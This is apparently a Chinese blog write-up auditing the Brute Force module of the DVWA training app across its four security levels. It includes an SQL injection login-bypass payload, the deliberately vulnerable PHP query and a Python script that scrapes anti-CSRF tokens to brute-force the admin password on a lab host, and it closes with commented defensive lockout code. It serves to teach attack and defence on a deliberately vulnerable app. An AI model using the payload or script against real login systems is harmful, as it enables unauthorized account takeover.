DVWA1.9 (一) Brute Force代码审计
文章目录
- 摘要
- Low
- Medium
- High
- Impossible 代码浅析
摘要
包含Brute Force四个级别(Low,Medium,High,Impossible),浅述了前三个级别的漏洞及其利用方式,着重解读了Impossible的代码
Low
简要:没有对用户输入做处理
漏洞:存在SQL注入
方案:在Username输入框中输入 ’ or 1=1 limit 1;# 即可实现注入
if( isset( $_GET[ 'Login' ] ) ) {
$user = $_GET[ 'username' ];
$pass = $_GET[ 'password' ];
$pass = md5( $pass );
// 此处可发现程序仅用md5处理了$pass,没有对$user的值进行处理有SQL注入漏洞,由下面 *标记* 可知通过验证需要使用账户信息查询到记录,并且条数为1,所以我们在Username处输入( ' or 1=1 limit 1;# )即可
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( ''
. ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . 'Medium
简要:在Low基础上修复了注入漏洞
漏洞:没有对爆破做限制
方案:使用Burp Suite工具爆破
// 在获取用户输入信息时,使用mysql_escape_string()处理特殊字符,以此抵御SQL注入
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
High
简要:在Medium基础上添加token认证机制防止CSRF攻击,一般爆破工具无法使用
方案:使用脚本破解
if( isset( $_GET[ 'Login' ] ) ) {
// Check Anti-CSRF token
// 加入token认证机制,使用脚本破解
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// 处理用户输入信息
$user = $_GET[ 'username' ];
$user = stripslashes( $user );
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = $_GET[ 'password' ];
$pass = stripslashes( $pass );
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Check database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( ''
. ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . 'py破解脚本
import requests
from bs4 import BeautifulSoup
_url = 'http://192.168.46.132/vulnerabilities/brute/index.php'
_headers = {
'Host': '192.168.46.132',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
'Cookie': 'PHPSESSID=fl74e405f4l5vmgmd7sb6dumu4; security=high',
'Referer': 'http://192.168.46.132/vulnerabilities/brute/index.php'
}
# 获取网页token
def get_token(_url):
r = requests.get(url=_url, headers=_headers)
soup = BeautifulSoup(r.text, 'html.parser')
token = soup.find('input', attrs={'name':'user_token'}).attrs['value']
return token
pwd_list = ['aaaaaaaa','bbbbbbbb','cccccccc','password','dddddddd']
# 利用密码字典+token暴力破解
for pwd in pwd_list:
# 构造url
url = _url+'?username=admin&password= &Login=Login&user_token=TOKEN#'\
.replace(' ', pwd).replace('TOKEN', get_token(_url))
r = requests.get(url, headers=_headers)
# 通过响应长度判断密码正确与否
str = 'password:%s\t status:%d\t size:%d'%(pwd, r.status_code, len(r.text))
print(str)
运行得到结果(密码为password时响应的结果size不一样,显然password是答案)
Impossible 代码浅析
简要:在High基础上,添加多次失败后锁定账户的机制,使得爆破无法有效进行
方案:暂无
if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
// Check Anti-CSRF token
// 检查客户端携带的token,防止CSRF攻击
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// 处理用户输入信息
$user = $_POST[ 'username' ];
$user = stripslashes( $user ); // 去掉反斜杆 '\'
// 使用msyqli_real_escape_string()转义$user里存在的特殊字符,防止SQL注入
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// 同理 $user
$pass = $_POST[ 'password' ];
$pass = stripslashes( $pass );
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass ); // 使用md5()生成摘要
// 默认值参数
$total_failed_login = 3; // 默认允许登录失败次数
$lockout_time = 15; // 默认锁定时间(分钟)
$account_locked = false; // 默认未锁定
// 获取当前用户$user登录信息(登陆失败次数,最后一次登录时间戳)
$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// 如果$user存在,且失败登录次数超过允许登录失败次数,则锁定当前用户$user
if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
// User locked out. Note, using this method would allow for user enumeration!
//echo "
This account has been locked due to too many incorrect logins.
";
$last_login = strtotime( $row[ 'last_login' ] ); // 获取最后一次登录的时间(秒)
$timeout = $last_login + ($lockout_time * 60); // 计算时间戳到达多少秒时可登录
$timenow = time(); // 获取当前时间戳
/*
print "The last login was: " . date ("h:i:s", $last_login) . "
";
print "The timenow is: " . date ("h:i:s", $timenow) . "
";
print "The timeout is: " . date ("h:i:s", $timeout) . "
";
*/
// 如果当前时间戳小于可登录时间
if( $timenow < $timeout ) {
$account_locked = true; // 将账户置为锁定状态
// print "The account is locked
";
}
}
// 检查账号密码信息
$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR);
$data->bindParam( ':password', $pass, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// 如果账户密码匹配成功,且账户未锁定
if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
// 登录成功,获取并显示相应信息
$avatar = $row[ 'avatar' ];
$failed_login = $row[ 'failed_login' ];
$last_login = $row[ 'last_login' ];
echo "Welcome to the password protected area {$user}
";
echo "![](\"<span)
{$avatar}\" />";
// 如果存在多次登录失败导致锁定的情况,告知用户
if( $failed_login >= $total_failed_login ) {
echo "Warning: Someone might of been brute forcing your account.
";
echo "Number of login attempts: {$failed_login}.
Last login attempt was at: ${last_login}.
";
}
// 重置登录失败次数
$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
} else {
// 如果用户信息错误,登录失败
// 停顿一定时间,抑制大量爆破请求
sleep( rand( 2, 4 ) );
// Give the user some feedback
echo "
Username and/or password incorrect.
Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
";
// 登录失败次数+1
$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// 更新最后一次登录时间
$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
DVWA Github